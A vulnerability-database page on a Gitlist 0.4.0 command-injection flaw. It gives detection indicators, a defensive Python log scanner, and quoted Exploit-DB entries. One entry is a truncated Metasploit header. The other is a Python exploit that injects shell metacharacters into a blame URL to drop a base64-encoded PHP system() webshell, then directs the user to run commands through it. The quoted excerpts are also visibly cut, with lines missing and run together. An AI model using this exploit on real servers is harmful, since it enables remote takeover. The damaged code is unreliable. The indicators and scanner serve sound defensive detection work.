CVE-2013-7392
Published 2014-07-22
Gitlist allows remote attackers to execute arbitrary commands via shell metacharacters in a file name to Source/.
Priority: P2 (64), high
CVSS 2.0: 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 8.48% (94.3th percentile)
Detection & IOCs
- Monitor web server logs for POST/GET requests to /cache/x.php, which is the dropped webshell path used by the exploit.
- Detect the base64-encoded PHP webshell payload string 'PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=' appearing in HTTP request URIs, which decodes to a system() shell.
- Flag use of ${IFS} as a space-bypass technique in HTTP request URIs targeting Gitlist blame endpoints, a characteristic evasion used by the Metasploit module.
- The exploit specifically targets Gitlist version 0.4.0; the vulnerability is the blame handler's failure to sanitize filenames containing shell metacharacters.
- The exploit requires knowledge of a writable cache path on the target server to drop the webshell; the path is passed as a command-line argument.
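The three log-based indicators above, turned into a small detector that runs over web-server access log lines. This is an added example, not part of the CVE record or of any published rule; the log lines are constructed, and the generic shell-metacharacter check on blame URIs is an extension beyond the listed IOCs, grounded in the unsanitized-filename root cause described above.

```python
import re
from urllib.parse import unquote

# Indicators taken from the detection notes for this CVE.
WEBSHELL_PATH = "/cache/x.php"
PAYLOAD_B64 = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
IFS_BYPASS = "${IFS}"

# Apache/nginx combined-format request field: "METHOD URI HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def classify_request(uri):
    """Return the indicator names that match one request URI.

    The URI is percent-decoded twice so that double-encoded attempts are
    inspected in their final form; exploit tooling URL-encodes the
    injected command before sending it to the blame handler."""
    decoded = unquote(unquote(uri))
    path = decoded.split("?", 1)[0]
    hits = []
    if path.endswith(WEBSHELL_PATH):
        hits.append("webshell_path")
    if PAYLOAD_B64 in decoded:
        hits.append("b64_webshell_payload")
    if "/blame/" in decoded and IFS_BYPASS in decoded:
        hits.append("ifs_bypass_blame")
    # Assumption: legitimate file names under blame/ do not contain these
    # characters, so any of them in a blame URI is worth a closer look.
    if "/blame/" in decoded and any(ch in decoded for ch in "`|;$"):
        hits.append("shell_metachar_in_blame")
    return hits


def scan_log(lines):
    """Yield (line_number, uri, hits) for each log line matching an indicator."""
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group("uri"))
        if hits:
            yield n, m.group("uri"), hits


# Constructed sample log: one benign blame request, then three suspicious ones.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jul/2014:10:00:01 +0000] "GET /repo.git/blame/master/README.md HTTP/1.1" 200 512',
    '10.0.0.9 - - [22/Jul/2014:10:00:07 +0000] "GET /repo.git/blame/master/%60echo%20PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=%7Cbase64%20-d%60 HTTP/1.1" 500 0',
    '10.0.0.9 - - [22/Jul/2014:10:00:09 +0000] "GET /cache/x.php?cmd=id HTTP/1.1" 200 48',
    '10.0.0.9 - - [22/Jul/2014:10:00:11 +0000] "GET /repo.git/blame/master/a%24%7BIFS%7Db HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for n, uri, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}  <- {uri}")
```

A 500 response on a blame request that also carries a metacharacter is a useful secondary signal, since the exploit on this page treats a 500 as success.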
No detection rules found.
Exploit-DB: Gitlist - Remote Command Execution (Metasploit)
exploitdb · 2014-07-07 · CVE-2014-4511
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Gitlist Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
crafted file name when trying to blame it.
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'drone', #discovery/poc by @dronesec
'Brandon Perry ' #Metasploit module
],
'References' =>
[
['CVE', '2014-4511'],
['EDB', '33929'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitl
Exploit-DB: Gitlist 0.4.0 - Remote Code Execution
exploitdb · 2014-06-30 · CVSS 7.5 · CVE-2014-5023 [HIGH]
---
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist 2:
path = sys.argv[2]
print '[!] Using cache location %s' % path
# payload
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)
out = getoutput("wget %s" % mpath)
if '500' in out:
print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
print '[-] Failed to drop'
print out
No writeups or analysis indexed.